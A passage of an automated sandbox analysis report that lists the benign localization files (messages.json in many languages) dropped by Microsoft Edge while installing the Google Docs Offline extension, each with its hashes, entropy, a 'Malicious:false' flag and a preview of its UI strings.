                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\sv\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):884
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                                                                  MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                                                                  SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                                                                  SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                                                                  SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\sw\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):980
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                                                                  MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                                                                  SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                                                                  SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                                                                  SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\ta\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1941
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                                                                                                  MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                                                                                                  SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                                                                                                  SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                                                                                                  SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\te\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1969
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                                                                  MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                                                                  SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                                                                  SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                                                                                                  SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\th\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1674
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                                                                  MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                                                                  SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                                                                  SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                                                                  SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\tr\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1063
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                                                                  MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                                                                  SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                                                                                                  SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                                                                  SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\uk\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1333
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                                                                                                  MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                                                                  SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                                                                  SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                                                                  SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\ur\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1263
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                                                                  MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                                                                  SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                                                                  SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                                                                  SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\vi\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1074
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                                                                  MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                                                                  SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                                                                  SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                                                                  SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\zh_CN\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):879
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                                                                  MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                                                                  SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                                                                  SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                                                                  SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\zh_HK\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1205
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                                                  MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                                                  SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                                                  SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                                                  SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\zh_TW\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):843
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                                                  MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                                                  SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                                                  SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                                                  SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\zu\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):912
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                                                  MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                                                  SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                                                  SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                                                  SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):11406
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.745845607168024
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                                                                                                                                                                  MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                                                                                                                                                                  SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                                                                                                                                                                  SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                                                                                                                                                                                  SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                                                                                                                                                                  Malicious:false
